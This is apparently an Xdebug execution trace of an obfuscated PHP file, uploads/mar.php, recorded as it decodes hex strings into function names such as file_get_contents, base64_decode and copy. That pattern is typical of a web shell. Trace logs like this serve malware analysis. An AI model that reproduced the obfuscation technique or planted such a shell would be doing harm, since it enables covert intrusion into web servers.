2	60	0	0.003556	520312	uhex	1		/var/www/html/uploads/mar.php	44	1	'676574637764'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	61	0	0.003599	520344	hexdec	0		/var/www/html/uploads/mar.php	540	1	'67'
3	61	1	0.003615	520392
3	61	R			103
3	62	0	0.003633	520312	chr	0		/var/www/html/uploads/mar.php	540	1	103
3	62	1	0.003648	520352
3	62	R			'g'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'g'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	63	0	0.003690	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	63	1	0.003707	520424
3	63	R			101
3	64	0	0.003724	520344	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	64	1	0.003738	520384
3	64	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	65	0	0.003780	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	65	1	0.003797	520424
3	65	R			116
3	66	0	0.003814	520344	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	66	1	0.003829	520384
3	66	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	67	0	0.003873	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	67	1	0.003896	520424
3	67	R			99
3	68	0	0.003913	520344	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	68	1	0.003929	520384
3	68	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	69	0	0.003973	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'77'
3	69	1	0.003990	520424
3	69	R			119
3	70	0	0.004008	520344	chr	0		/var/www/html/uploads/mar.php	540	1	119
3	70	1	0.004024	520384
3	70	R			'w'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'w'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	71	0	0.004067	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	71	1	0.004084	520424
3	71	R			100
3	72	0	0.004101	520344	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	72	1	0.004116	520384
3	72	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	60	1	0.004159	520344
2	60	R			'getcwd'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'getcwd'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	73	0	0.004205	520344	uhex	1		/var/www/html/uploads/mar.php	44	1	'707265675f73706c6974'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	74	0	0.004249	520376	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	74	1	0.004266	520424
3	74	R			112
3	75	0	0.004284	520344	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	75	1	0.004299	520384
3	75	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	76	0	0.004343	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	76	1	0.004360	520456
3	76	R			114
3	77	0	0.004377	520376	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	77	1	0.004393	520416
3	77	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	78	0	0.004437	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	78	1	0.004453	520456
3	78	R			101
3	79	0	0.004471	520376	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	79	1	0.004487	520416
3	79	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	80	0	0.004530	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'67'
3	80	1	0.004551	520456
3	80	R			103
3	81	0	0.004569	520376	chr	0		/var/www/html/uploads/mar.php	540	1	103
3	81	1	0.004601	520416
3	81	R			'g'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'g'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	82	0	0.004646	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	82	1	0.004663	520456
3	82	R			95
3	83	0	0.004680	520376	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	83	1	0.004696	520416
3	83	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	84	0	0.004740	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	84	1	0.004758	520456
3	84	R			115
3	85	0	0.004776	520376	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	85	1	0.004792	520416
3	85	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	86	0	0.004835	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	86	1	0.004852	520456
3	86	R			112
3	87	0	0.004869	520376	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	87	1	0.004885	520416
3	87	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	88	0	0.004928	520408	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	88	1	0.004945	520456
3	88	R			108
3	89	0	0.004962	520376	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	89	1	0.004987	520416
3	89	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	90	0	0.005031	520416	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	90	1	0.005048	520464
3	90	R			105
3	91	0	0.005065	520384	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	91	1	0.005079	520424
3	91	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	92	0	0.005121	520416	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	92	1	0.005137	520464
3	92	R			116
3	93	0	0.005154	520384	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	93	1	0.005170	520424
3	93	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	73	1	0.005212	520384
2	73	R			'preg_split'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'preg_split'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	94	0	0.005260	520384	uhex	1		/var/www/html/uploads/mar.php	44	1	'636f7079'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	95	0	0.005302	520416	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	95	1	0.005319	520464
3	95	R			99
3	96	0	0.005336	520384	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	96	1	0.005352	520424
3	96	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	97	0	0.005394	520448	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	97	1	0.005409	520496
3	97	R			111
3	98	0	0.005432	520416	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	98	1	0.005453	520456
3	98	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	99	0	0.005507	520448	hexdec	0		/var/www/html/uploads/mar.php	540	1	'70'
3	99	1	0.005527	520496
3	99	R			112
3	100	0	0.005552	520416	chr	0		/var/www/html/uploads/mar.php	540	1	112
3	100	1	0.005571	520456
3	100	R			'p'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'p'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	101	0	0.005624	520448	hexdec	0		/var/www/html/uploads/mar.php	540	1	'79'
3	101	1	0.005643	520496
3	101	R			121
3	102	0	0.005665	520416	chr	0		/var/www/html/uploads/mar.php	540	1	121
3	102	1	0.005684	520456
3	102	R			'y'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'y'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	94	1	0.005753	520416
2	94	R			'copy'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'copy'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	103	0	0.005812	520416	uhex	1		/var/www/html/uploads/mar.php	44	1	'66696c655f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	104	0	0.005869	520448	hexdec	0		/var/www/html/uploads/mar.php	540	1	'66'
3	104	1	0.005890	520496
3	104	R			102
3	105	0	0.005913	520416	chr	0		/var/www/html/uploads/mar.php	540	1	102
3	105	1	0.005930	520456
3	105	R			'f'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'f'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	106	0	0.005986	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	106	1	0.006002	520528
3	106	R			105
3	107	0	0.006019	520448	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	107	1	0.006034	520488
3	107	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	108	0	0.006084	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	108	1	0.006104	520528
3	108	R			108
3	109	0	0.006128	520448	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	109	1	0.006147	520488
3	109	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	110	0	0.006211	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	110	1	0.006230	520528
3	110	R			101
3	111	0	0.006254	520448	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	111	1	0.006274	520488
3	111	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	112	0	0.006330	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	112	1	0.006350	520528
3	112	R			95
3	113	0	0.006374	520448	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	113	1	0.006395	520488
3	113	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	114	0	0.006451	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'67'
3	114	1	0.006469	520528
3	114	R			103
3	115	0	0.006493	520448	chr	0		/var/www/html/uploads/mar.php	540	1	103
3	115	1	0.006513	520488
3	115	R			'g'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'g'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	116	0	0.006753	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	116	1	0.006777	520528
3	116	R			101
3	117	0	0.006801	520448	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	117	1	0.006820	520488
3	117	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	118	0	0.006872	520480	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	118	1	0.006891	520528
3	118	R			116
3	119	0	0.006912	520448	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	119	1	0.006931	520488
3	119	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	120	0	0.006979	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	120	1	0.006998	520536
3	120	R			95
3	121	0	0.007019	520456	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	121	1	0.007037	520496
3	121	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	122	0	0.007087	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	122	1	0.007106	520536
3	122	R			99
3	123	0	0.007126	520456	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	123	1	0.007144	520496
3	123	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	124	0	0.007193	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	124	1	0.007210	520536
3	124	R			111
3	125	0	0.007228	520456	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	125	1	0.007243	520496
3	125	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	126	0	0.007285	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	126	1	0.007301	520536
3	126	R			110
3	127	0	0.007319	520456	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	127	1	0.007334	520496
3	127	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	128	0	0.007377	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	128	1	0.007393	520536
3	128	R			116
3	129	0	0.007411	520456	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	129	1	0.007426	520496
3	129	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	130	0	0.007467	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	130	1	0.007484	520536
3	130	R			101
3	131	0	0.007502	520456	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	131	1	0.007518	520496
3	131	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	132	0	0.007563	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	132	1	0.007579	520536
3	132	R			110
3	133	0	0.007607	520456	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	133	1	0.007623	520496
3	133	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	134	0	0.007668	520488	hexdec	0		/var/www/html/uploads/mar.php	540	1	'74'
3	134	1	0.007685	520536
3	134	R			116
3	135	0	0.007703	520456	chr	0		/var/www/html/uploads/mar.php	540	1	116
3	135	1	0.007719	520496
3	135	R			't'
2		A						/var/www/html/uploads/mar.php	540	$n .= 't'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	136	0	0.007764	520496	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	136	1	0.007782	520544
3	136	R			115
3	137	0	0.007800	520464	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	137	1	0.007816	520504
3	137	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	103	1	0.007861	520464
2	103	R			'file_get_contents'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'file_get_contents'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	138	0	0.007912	520464	uhex	1		/var/www/html/uploads/mar.php	44	1	'6261736536345f6465636f6465'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	139	0	0.007958	520496	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	139	1	0.007976	520544
3	139	R			98
3	140	0	0.007994	520464	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	140	1	0.008010	520504
3	140	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	141	0	0.008056	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	141	1	0.008073	520576
3	141	R			97
3	142	0	0.008091	520496	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	142	1	0.008108	520536
3	142	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	143	0	0.008154	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	143	1	0.008172	520576
3	143	R			115
3	144	0	0.008190	520496	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	144	1	0.008206	520536
3	144	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	145	0	0.008250	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	145	1	0.008268	520576
3	145	R			101
3	146	0	0.008286	520496	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	146	1	0.008302	520536
3	146	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	147	0	0.008347	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'36'
3	147	1	0.008364	520576
3	147	R			54
3	148	0	0.008382	520496	chr	0		/var/www/html/uploads/mar.php	540	1	54
3	148	1	0.008398	520536
3	148	R			'6'
2		A						/var/www/html/uploads/mar.php	540	$n .= '6'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	149	0	0.008443	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'34'
3	149	1	0.008460	520576
3	149	R			52
3	150	0	0.008479	520496	chr	0		/var/www/html/uploads/mar.php	540	1	52
3	150	1	0.008495	520536
3	150	R			'4'
2		A						/var/www/html/uploads/mar.php	540	$n .= '4'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	151	0	0.008539	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	151	1	0.008556	520576
3	151	R			95
3	152	0	0.008574	520496	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	152	1	0.008591	520536
3	152	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	153	0	0.008635	520528	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	153	1	0.008652	520576
3	153	R			100
3	154	0	0.008672	520496	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	154	1	0.008695	520536
3	154	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	155	0	0.008740	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	155	1	0.008757	520584
3	155	R			101
3	156	0	0.008774	520504	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	156	1	0.008791	520544
3	156	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	157	0	0.008837	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	157	1	0.008854	520584
3	157	R			99
3	158	0	0.008872	520504	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	158	1	0.008888	520544
3	158	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	159	0	0.008933	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	159	1	0.008951	520584
3	159	R			111
3	160	0	0.008969	520504	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	160	1	0.008985	520544
3	160	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	161	0	0.009030	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	161	1	0.009048	520584
3	161	R			100
3	162	0	0.009065	520504	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	162	1	0.009081	520544
3	162	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	163	0	0.009124	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	163	1	0.009140	520584
3	163	R			101
3	164	0	0.009158	520504	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	164	1	0.009172	520544
3	164	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	138	1	0.009216	520504
2	138	R			'base64_decode'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'base64_decode'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	165	0	0.009263	520504	uhex	1		/var/www/html/uploads/mar.php	44	1	'69735f646972'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	166	0	0.009306	520536	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	166	1	0.009322	520584
3	166	R			105
3	167	0	0.009341	520504	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	167	1	0.009356	520544
3	167	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	168	0	0.009399	520568	hexdec	0		/var/www/html/uploads/mar.php	540	1	'73'
3	168	1	0.009415	520616
3	168	R			115
3	169	0	0.009432	520536	chr	0		/var/www/html/uploads/mar.php	540	1	115
3	169	1	0.009447	520576
3	169	R			's'
2		A						/var/www/html/uploads/mar.php	540	$n .= 's'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	170	0	0.009488	520568	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	170	1	0.009504	520616
3	170	R			95
3	171	0	0.009522	520536	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	171	1	0.009538	520576
3	171	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	172	0	0.009581	520568	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	172	1	0.009596	520616
3	172	R			100
3	173	0	0.009613	520536	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	173	1	0.009628	520576
3	173	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	174	0	0.009669	520568	hexdec	0		/var/www/html/uploads/mar.php	540	1	'69'
3	174	1	0.009687	520616
3	174	R			105
3	175	0	0.009704	520536	chr	0		/var/www/html/uploads/mar.php	540	1	105
3	175	1	0.009719	520576
3	175	R			'i'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'i'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	176	0	0.009800	520568	hexdec	0		/var/www/html/uploads/mar.php	540	1	'72'
3	176	1	0.009817	520616
3	176	R			114
3	177	0	0.009833	520536	chr	0		/var/www/html/uploads/mar.php	540	1	114
3	177	1	0.009849	520576
3	177	R			'r'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'r'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	165	1	0.009890	520536
2	165	R			'is_dir'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'is_dir'
1		A						/var/www/html/uploads/mar.php	44	$i++
2	178	0	0.009939	520856	uhex	1		/var/www/html/uploads/mar.php	44	1	'6f625f656e645f636c65616e28293b'
2		A						/var/www/html/uploads/mar.php	538	$n = ''
2		A						/var/www/html/uploads/mar.php	539	$i = 0
3	179	0	0.009974	520888	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6f'
3	179	1	0.009987	520936
3	179	R			111
3	180	0	0.010000	520856	chr	0		/var/www/html/uploads/mar.php	540	1	111
3	180	1	0.010012	520896
3	180	R			'o'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'o'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	181	0	0.010043	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'62'
3	181	1	0.010055	520968
3	181	R			98
3	182	0	0.010067	520888	chr	0		/var/www/html/uploads/mar.php	540	1	98
3	182	1	0.010079	520928
3	182	R			'b'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'b'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	183	0	0.010109	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	183	1	0.010121	520968
3	183	R			95
3	184	0	0.010134	520888	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	184	1	0.010145	520928
3	184	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	185	0	0.010176	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	185	1	0.010188	520968
3	185	R			101
3	186	0	0.010200	520888	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	186	1	0.010211	520928
3	186	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	187	0	0.010241	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	187	1	0.010253	520968
3	187	R			110
3	188	0	0.010265	520888	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	188	1	0.010276	520928
3	188	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	189	0	0.010306	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'64'
3	189	1	0.010318	520968
3	189	R			100
3	190	0	0.010330	520888	chr	0		/var/www/html/uploads/mar.php	540	1	100
3	190	1	0.010342	520928
3	190	R			'd'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'd'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	191	0	0.010371	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'5f'
3	191	1	0.010383	520968
3	191	R			95
3	192	0	0.010396	520888	chr	0		/var/www/html/uploads/mar.php	540	1	95
3	192	1	0.010407	520928
3	192	R			'_'
2		A						/var/www/html/uploads/mar.php	540	$n .= '_'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	193	0	0.010437	520920	hexdec	0		/var/www/html/uploads/mar.php	540	1	'63'
3	193	1	0.010449	520968
3	193	R			99
3	194	0	0.010461	520888	chr	0		/var/www/html/uploads/mar.php	540	1	99
3	194	1	0.010472	520928
3	194	R			'c'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'c'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	195	0	0.010505	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6c'
3	195	1	0.010517	520976
3	195	R			108
3	196	0	0.010579	520896	chr	0		/var/www/html/uploads/mar.php	540	1	108
3	196	1	0.010596	520936
3	196	R			'l'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'l'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	197	0	0.010629	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'65'
3	197	1	0.010645	520976
3	197	R			101
3	198	0	0.010658	520896	chr	0		/var/www/html/uploads/mar.php	540	1	101
3	198	1	0.010669	520936
3	198	R			'e'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'e'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	199	0	0.010700	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'61'
3	199	1	0.010712	520976
3	199	R			97
3	200	0	0.010724	520896	chr	0		/var/www/html/uploads/mar.php	540	1	97
3	200	1	0.010736	520936
3	200	R			'a'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'a'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	201	0	0.010766	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'6e'
3	201	1	0.010778	520976
3	201	R			110
3	202	0	0.010790	520896	chr	0		/var/www/html/uploads/mar.php	540	1	110
3	202	1	0.010802	520936
3	202	R			'n'
2		A						/var/www/html/uploads/mar.php	540	$n .= 'n'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	203	0	0.010832	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'28'
3	203	1	0.010844	520976
3	203	R			40
3	204	0	0.010857	520896	chr	0		/var/www/html/uploads/mar.php	540	1	40
3	204	1	0.010868	520936
3	204	R			'('
2		A						/var/www/html/uploads/mar.php	540	$n .= '('
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	205	0	0.010898	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'29'
3	205	1	0.010910	520976
3	205	R			41
3	206	0	0.010922	520896	chr	0		/var/www/html/uploads/mar.php	540	1	41
3	206	1	0.010933	520936
3	206	R			')'
2		A						/var/www/html/uploads/mar.php	540	$n .= ')'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
3	207	0	0.010964	520928	hexdec	0		/var/www/html/uploads/mar.php	540	1	'3b'
3	207	1	0.010975	520976
3	207	R			59
3	208	0	0.010988	520896	chr	0		/var/www/html/uploads/mar.php	540	1	59
3	208	1	0.010999	520936
3	208	R			';'
2		A						/var/www/html/uploads/mar.php	540	$n .= ';'
2		A						/var/www/html/uploads/mar.php	539	$i += 2
2	178	1	0.011029	520896
2	178	R			'ob_end_clean();'
1		A						/var/www/html/uploads/mar.php	44	$GNJ[] = 'ob_end_clean();'
1		A						/var/www/html/uploads/mar.php	44	$i++
